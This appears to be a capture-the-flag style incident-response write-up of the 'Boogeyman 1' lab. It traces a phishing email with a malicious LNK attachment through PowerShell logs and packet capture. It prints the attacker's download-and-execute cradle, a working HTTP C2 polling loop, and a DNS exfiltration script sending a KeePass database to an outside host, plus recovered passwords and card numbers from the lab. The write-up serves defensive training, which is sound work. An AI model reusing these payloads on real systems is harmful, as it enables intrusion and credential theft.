Boogeyman 1

A new threat actor emerges from the wild using the name Boogeyman. Are you afraid of the Boogeyman?

CONTEXT

I. Background

Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

II. Tools and Artifacts

1. Exfiltration

$ impacket-smbserver jebidiah . -smb2support

ubuntu@tryhackme:~$ cd Desktop

ubuntu@tryhackme:~/Desktop$ zip -r artefacts.zip artefacts/*  
  
  [..omitted..]
  
ubuntu@tryhackme:~/Desktop$ smbclient //10.8.81.251/jebidiah -c 'put artefacts.zip' -N

  putting file artefacts.zip as \artefacts.zip (2551.7 kb/s) (average 2551.7 kb/s)

$ unzip artefacts.zip

$ ls artefacts

  capture.pcapng  dump.eml  evtx2json  powershell.evtx  powershell.json

2. PowerShell Events

$ cat powershell.json | jq -r '.EventID' | sort | uniq -c | sort -bnr

    939 4104
     44 4100
      2 53504
      1 40962
      1 40961

3. Protocol Heirarchy

$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr

  38769 TCP
   3422 TLSv1.3
   2060 QUIC
   1989 HTTP
   1229 DNS
   1084 TLSv1.2
     82 SSDP
     77 TLSv1
     74 ARP
     14 UDP
     12 NBNS
     10 MDNS
      7 HTTP/XML
      5 SSLv2
      5 IGMPv3
      5 ICMPv6
      5 ICMP
      5 BROWSER
      2 LLMNR
      2 DHCP

ANALYSIS

I. Email Analysis

The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.

1. Exchange Information

Looking at the following information, an email was sent by Arthur Griffin (agriffin@bpakcaging.xyz) to Julianne Westcott (julianne.westcott@hotmail.com):

From: Arthur Griffin <agriffin@bpakcaging.xyz>
Date: Fri, 13 Jan 2023 09:25:26 +0000
Subject: Collection for Quick Logistics LLC - Jan 2023
Message-Id: <4uiwqc5wd1qx.HPk2p-JE_jYbkWIRB-SmuA2@tracking.bpakcaging.xyz>
Reply-To: Arthur Griffin <agriffin@bpakcaging.xyz>
Sender: agriffin@bpakcaging.xyz
To: Julianne Westcott <julianne.westcott@hotmail.com>

2. Security Headers

Both SPF and DMARC were marked as passed which shows that there is an unlikely event of email spoofing. The email also passed the DKIM check where two signatures were detected -- bpakcaging.xyz and elasticemail.com. The latter seems to be the MTA (Mail Transfer Agent) used by the attacker.

Authentication-Results: spf=pass (sender IP is 15.235.99.80)
 smtp.mailfrom=bpakcaging.xyz; dkim=pass (signature was verified)
 header.d=bpakcaging.xyz;dmarc=bestguesspass action=none
 header.from=bpakcaging.xyz;compauth=pass reason=109
Received-SPF: Pass (protection.outlook.com: domain of bpakcaging.xyz
 designates 15.235.99.80 as permitted sender) receiver=protection.outlook.com;
 client-ip=15.235.99.80; helo=pa80.mxout.mta1.net; pr=C
DKIM-Signature: v=1; a=rsa-sha256; d=bpakcaging.xyz; s=api; c=relaxed/simple;
	t=1673601926; h=from:date:subject:reply-to:to:list-unsubscribe:mime-version;
	bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
	b=dCB9MhhsZqg4h2P9dg5zMjLj7HVS9vt0fXuqEzH8cj6ft+YBJxvZHkF8uc+CeOas6CoICaPu13Q
	oL/xVebg3aO8bmlooJWTAZx7mmrh/1ZQBVHm3wvGVI9Xn55nhWzRGoqVOAAPPM6+MEHFwZDIjKDAs
	RpDurrnykQeCXCp127k=
DKIM-Signature: v=1; a=rsa-sha256; d=elasticemail.com; s=api;
	c=relaxed/simple; t=1673601926;
	h=from:date:subject:reply-to:to:list-unsubscribe;
	bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
	b=jcC3z+U5lVQUJEYRyQ76Z+xaJMrXN2YdjyM8pUl7hgXesQaY7rqSORNRWynpDQ3/CBSllw31eDq
	WmoqpFqj2uVy5RXK73lkBEHs5ju1eH/4svHpZLS9+wU/tO5dfZVUImvY32iinpJCtoiMLjdpKYMA/
	d5BBGqluALtqy9fZQzM=

3. Email Body

It states that there is an encrypted attachment that could be opened with the password, Invoice2023!.

<html>
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf-8"></=
head>
<body style=3D"font-size: 13px; font-family: Helvetica;">
<br>
<p>Hi Julianne,</p>

<p>I hope you are well.</p>

<p>I just wanted to drop you a quick note to remind you in respect of docum=
ent #39586972 is due for payment on January 20, 2023.</p>

<p>I would be grateful if you could confirm everything is on track for paym=
ent.</p>

<p>For additional information, kindly see the attached document.<br><br>
You may use this code to view the encrypted file: <strong>Invoice2023!</str=
ong></p>


<p>Best regards,<br>
<strong>Arthur Griffin</strong><br>
Collections Officer<br>
B Packaging Inc.<br><br>

4. Email Attachment

A zip file, Invoice.zip, was attached to the email.

--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==
Content-Type: application/zip
Content-Disposition: attachment; filename="Invoice.zip"; size=908;
Content-Transfer-Encoding: base64

UEsDBBQAAQAIAGiGLVZRFQDJ3gIAACgJAAAUAAAASW52b2ljZV8yMDIzMDEwMy5sbmvuhS6/jU+4
ClhWAZwY+LBcOUvw6oMIq5WNiZwjlKXvAj+pMMBFROiABqlJBxngGOoWUKX0yBXsXOhYPq3Z+Zls
vZX0xZqtZ/KWnX/QpZXzW44KZz1eqH+hnLgKXPTBsyTSqpqK9QUvYEsltPMSYnL0IqSNwX2TuL9l
oB0QB3owNKK2cltANxR5Nt3pdYwKJ4BqqI4x7D/ze4bWBT1jlR4HW8VEByEyLoc2fw3I0r0bc/8J
v9g1SZPBvshBg0pxI0/89GR2agMP+Lv6smkO/huUEOSRpidp/ft+prkt5v9sHFyS/Q0CTb9njCi2
terQ9NTeFAOkNAhGxWUPqPwPzB0cS+GBC2JY3LMqlA0K5aTejRodyVPcLlq2KVbyF7XljH2NZA4T
bFsDNJMFk2fQB1hfvmseP9FA20VAfwYvYW8GnBDdqhJtAwJ5xNvJgFFK/MTY2fChwTNN2zszqhzn
v1Sx+71+duA41HGR9K/jh4nEeRgPslOVlGtLwKBikbIpx/5ZaLpiZYwKS177jDoh3Qx+FRxsM6Ue
hjPSNgKmWHFZjReDWx8KD7qGLL9acO0hvZUuH83b70sAREDJbw+4sC2jcYO+hrHys6E4Dml030WQ
WhkKpvYv4DUw9nDmkGg4YgnyAv/iMbtImSUZQ/Wc6dEJM213hYefp8DTQZ321fZU5iCk86bAdxX2
3Ov40S9eX78X7CSp9b0QKNeC+N3JgMJ/gQrCWC73UfmHjT4mkBoP8A4YktR2LFNeistVP/zeMQPS
qUs8KaI7q+VTu/9buNeWkEW2maDm+bC0Q4AnJL+AocgZDPJ0RzfLWEpff3nbaYb6aPqhLTBfFURi
dszLIMEKmDLmiVqkWZJly9qV26NFttz5y4Q+fAATd6tMYRDlu/BFCo4+rdxjiKl0Gnn7UBHCq0gy
eEv/L8bppKI09XqNV3MJxMLBE3RN7E080hVp07qDpNpQTYEFa08gGy6yYFBLAQI/ABQAAQAIAGiG
LVZRFQDJ3gIAACgJAAAUACQAAAAAAAAAIAAAAAAAAABJbnZvaWNlXzIwMjMwMTAzLmxuawoAIAAA
AAAAAQAYAGiPRUBvJ9kBAAAAAAAAAAAAAAAAAAAAAFBLBQYAAAAAAQABAGYAAAAQAwAAAAA=

--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==--

Taking the attachment then extracting its contents using the given password, Invoice2023!:

$ cat Invoice.zip_b64 | tr -d '\n' | base64 -d > Invoice.zip

$ file Invoice.zip          

  Invoice.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
  
$ unzip Invoice.zip  

  Archive:  Invoice.zip
  [Invoice.zip] Invoice_20230103.lnk password: Invoice2023!
  zsh: suspended  unzip Invoice.zip

Examining the contents of Invoice_20230103.lnk:

$ lnkparse Invoice_20230103.lnk 

  Windows Shortcut Information:
     Link CLSID: 00021401-0000-0000-C000-000000000046
     Link Flags: HasTargetIDList | HasName | HasRelativePath | HasWorkingDir | HasArguments | HasIconLocation | IsUnicode | HasExpIcon - (16637)
     File Flags:  - (0)

     Creation Timestamp: None
     Modified Timestamp: None
     Accessed Timestamp: None

     Icon Index: 0 
     Window Style: SW_SHOWMINNOACTIVE 
     HotKey: CONTROL - C {0x4302} 

     TARGETS:
        Index: 78
        ITEMS:
           Root Folder
              Sort index: My Computer
              Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
           Volume Item
              Flags: 0xf
              Data: None
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: Windows
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: System32
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: WindowsPowerShell
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: v1.0
           File entry
              Flags: Is file
              Modification time: None
              File attribute flags: 0
              Primary name: powershell.exe

     DATA
        Description: Invoice Jan 2023
        Relative path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Working directory: C:
        Command line arguments: -nop -windowstyle hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
        Icon location: C:\Users\Administrator\Desktop\excel.ico

     EXTRA BLOCKS:
        ICON_LOCATION_BLOCK
           Target ansi: %USERPROFILE%\Desktop\excel.ico
           Target unicode: %USERPROFILE%\Desktop\excel.ico
        SPECIAL_FOLDER_LOCATION_BLOCK
           Special folder id: 37
        KNOWN_FOLDER_LOCATION_BLOCK
           Known folder id: 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7
        METADATA_PROPERTIES_BLOCK
           Version: 0x53505331
           Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE

It executes an encoded PowerShell command which when decoded downloads a file, update, and executes it in memory:

iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')

II. LOG ANALYSIS

Based on the initial findings, we discovered how the malicious attachment compromised Julianne's workstation:
A PowerShell command was executed.
Decoding the payload reveals the starting point of endpoint activities.

1. Timestamp Fix

The JSON included has mixed timestamps and to fix that:

$ cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[]' > powershell1.json

2. PowerShell Logs

Looking at the executions relevant to this case, the attacker was able to do the following:

$ cat powershell1.json | grep 4104 | jq '.ScriptBlockText' | grep -v Set-StrictMode

The initial execution of downloading update from http://files.bpakcaging.xyz:

iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')

Execute a C2 connection via HTTP Protocol Tunnelling to cdn.bpakcaging.xyz:8080:

$s='cdn.bpakcaging.xyz:8080';$i='8cce49b0-b86459bb-27fe2489';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}\n

Which when expanded:

$s='cdn.bpakcaging.xyz:8080';
$i='8cce49b0-b86459bb-27fe2489';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};
while ($true){
    $c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;
    if ($c -ne 'None') {
        $r=iex $c -ErrorAction Stop -ErrorVariable e;
        $r=Out-String -InputObject $r;
        $t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
    } sleep 0.8
}

Upload and execute Seatbelt (host enumeration tool) to the workstation:

cd Users;pwd
cd j.westcott;pwd
ps;pwd
iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd
cd Public;pwd
cd Music;pwd
iwr http://files.bpakcaging.xyz/sb.exe -outfile sb.exe;pwd
.\\sb.exe all;pwd
.\\sb.exe system;pwd
.\\sb.exe;pwd
.\\sb.exe -group=all;pwd
Seatbelt.exe -group=user;pwd
.\\sb.exe -group=user;pwd

Locate a KeePass database -- C:\Users\j.westcott\Documents\protected_data.kdbx

 ls C:\\Users\\j.westcott\\Documents\\protected_data.kdbx;pwd

Read an SQLite3 database from Microsoft Sticky Notes stored in the user's Local AppData folder:

C:\Users\j.westcottAppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

cd ..\\AppData;pwd
ls Local;pwd
ls Local\\Packages;pwd
cd ..;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState;pwd
iwr http://files.bpakcaging.xyz/sq3.exe -outfile sq3.exe;pwd
.\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\;pwd
.\\Music\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite "SELECT * from NOTE limit 100";pwd

Exfiltrate via DNS the contents of protected_data.kdbx through nslookup to 167.71.211.113 as a subdomain of bpakcaging.xyz.

$file='protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
split-path $pwd'\\0x00';pwd
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
$hex = ($bytes|ForEach-Object ToString X2) -join '';;pwd
$split = $hex -split '(\\S{50})'; ForEach ($line in $split) { nslookup -q=A "$line.bpakcaging.xyz" $destination;} echo "Done";;pwd

Which when cleaned up a bit:

$file='protected_data.kdbx'; 
$destination = "167.71.211.113"; 
$bytes = [System.IO.File]::ReadAllBytes($file);
split-path $pwd'\\0x00';
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; 
$destination = "167.71.211.113"; 
$bytes = [System.IO.File]::ReadAllBytes($file);
$hex = ($bytes|ForEach-Object ToString X2) -join '';
$split = $hex -split '(\\S{50})'; 
ForEach ($line in $split) { 
    nslookup -q=A "$line.bpakcaging.xyz" $destination;
} 
echo "Done";

III. Network Analysis

Based on the PowerShell logs investigation, we have seen the full impact of the attack:
The threat actor was able to read and exfiltrate two potentially sensitive files.
The domains and ports used for the network activity were discovered, including the tool used by the threat actor for exfiltration.

1. HTTP Traffic

Looking at the servers associated with the domain, bpakcaging.xyz:

$ tshark -r capture.pcapng -Y 'http.response_for.uri contains "bpakcaging.xyz" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(server)")) then ({key: "server", value: .value}) else empty end) | .server' | sort | uniq -c | sort -nr

    929 Apache/2.4.1 
      3 SimpleHTTP/0.6 Python/3.10.7

an Apache and Python one were identified. The latter, given the count, could be associated with the file server where the executables found during the log analysis were downloaded from:

$ tshark -r capture.pcapng -Y 'http.server contains "Python" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(res.*uri)")) then ({key: "uri", value: .value}) else empty end) | .uri' 

  http://files.bpakcaging.xyz/update
  http://files.bpakcaging.xyz/sb.exe
  http://files.bpakcaging.xyz/sq3.exe

All requests to the Apache server could be traced to http://cdn.bpakcaging.xyz:8080:

$ tshark -r capture.pcapng -Y 'http.server contains "Apache" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(res.*uri)")) then ({key: "uri", value: .value}) else empty end) | .uri' | sort | uniq -c | sort -nr

    886 http://cdn.bpakcaging.xyz:8080/b86459bb
     42 http://cdn.bpakcaging.xyz:8080/27fe2489
      1 http://cdn.bpakcaging.xyz:8080/8cce49b0

To add, all requests made to /27fe2489 were found to be POST:

$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json | jq -r '.[]."_source".layers.http' | grep request.method | sed -E 's/.*".*": "(.*)",/\1/g' | sort | uniq -c | sort -nr

     42 POST

2. Command Executions

Looking at the POST data of a sample packet, it contains what seems to be decimal values:

$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json| jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.file_data")) then ({key: "data", value: .value}) else empty end) | .data' | head -n1

  13 13 10 13 10 80 97 116 104 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 45 45 45 45 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 67 58 92 87 105 110 100 111 119 115 92 115 121 115 116 101 109 51 50 13 10 13 10 13 10

Now, converting the data of all POST requests from decimal to ASCII:

$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json| jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.file_data")) then ({key: "data", value: .value}) else empty end) | .data' > c2.data

$ for i in $(cat c2.data); do for x in $i; do hex=$(printf '%x' $x); echo -ne "\x$hex"; done; done

It shows that a KeePass database was indeed found from the workstation:

    Directory: C:\Users\j.westcott\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        1/13/2023   4:38 PM           2206 protected_data.kdbx

As well as its master password stored in Microsoft Sticky Notes:

    Directory: C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/13/2023   4:38 PM                DiagOutputDir                                                         
-a----        1/13/2023   4:30 PM           1014 Ecs.dat                                                               
-a----        1/13/2023   4:30 PM           4096 plum.sqlite                                                           
-a----        1/13/2023   4:38 PM          32768 plum.sqlite-shm                                                       
-a----        1/13/2023   5:08 PM         168952 plum.sqlite-wal

Where the password is -- %p9^3!lL^Mz47E2GaT^y:

\id=868150bd-a564-423b-9256-70d3781794b1 Master Password
\id=ad8b52f0-e1bb-40f6-bbf9-47a53f9180ab %p9^3!lL^Mz47E2GaT^y|ManagedPosition=DeviceId:\\?\DISPLAY#Default_Monitor#1&31c5ecd4&0&UID256#{e6f07b5f-ee97-4a90-b076-33f57bf4eaa7};Position=1106,43;Size=320,320|1|0||Yellow|0||||||0||8ca22c0e-ba5e-499a-a86c-7473a53dc6de|74f08724-ccc9-4ce6-94e7-8c99e6cd42c6|638092247397199589||638092247516107079

3. DNS Exfiltration

Based on the decoded POST data, the attempt for exfiltration was indeed as a subdomain of bpakcaging.xyz:

*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 38943F8ED485C92DA84BCCE2E2082000C47157BAF0E6A7EF35.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for A00731B6CE6192813F7AC951F0C6460D89A27D91DE15C50920.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 007187B84DD4E121AED3668F75F3761E8AAC3169F81025A5AE.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 30D657448F4401890A0400020000000004000D0A0D0A3865AE.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for FAA72AA7E2FC9869F30F566E4F58A19582BDA4C0988D8E9F6C.bpakcaging.xyz
[..omitted..]

Looking at the packet capture, the chunked exfiltrated could also be seen:

$ tshark -r capture.pcapng -Y "dns" -T fields -e dns.qry.name | grep -E '[A-F0-9]+.bpakcaging.xyz$' | head -n 10                                                

  03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
  03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
  05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
  05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
  EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
  EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
  00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
  00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
  A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
  A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz

Cleaning the chunked data and putting it together retrieves the KeePass database file:

$ tshark -r capture.pcapng -Y "ip.dst==167.71.211.113 and dns" -T fields -e dns.qry.name | grep -E '[A-F0-9]+.bpakcaging.xyz$' | cut -d'.' -f1 | tr -d '\n' | xxd -p -r > protected_data.kdbx
                                                                                                                                                                                                                                            
$ file protected_data.kdbx 

  protected_data.kdbx: Keepass password database 2.x KDBX

Finally, opening the KeePass database using the password, %p9^3!lL^Mz47E2GaT^y, reveals information of a company card with an account number, 4024007128269551:

$ kpcli --kdb=protected_data.kdbx 
Provide the master password: *************************

kpcli:/> dir

  === Groups ===
  protected_data/

kpcli:/> cd protected_data

kpcli:/protected_data> dir

  === Groups ===
  eMail/
  General/
  Homebanking/
  Internet/
  Network/
  Recycle Bin/
  Windows/

kpcli:/protected_data> cd Homebanking

kpcli:/protected_data/Homebanking> dir

  === Entries ===
  0. Company Card                                                           

kpcli:/protected_data/Homebanking> show 0

  Title: Company Card
  Uname: 
   Pass: 
    URL: 
  Notes: 
  String Values: 
           1) Account Number = 4024007128269551
           2) CVV = 970
           3) Expiration Date = 3/2028
           4) Name = Quick Logistics LLC

PreviousBoogeyman 2 NextTempest

Last updated 5 months ago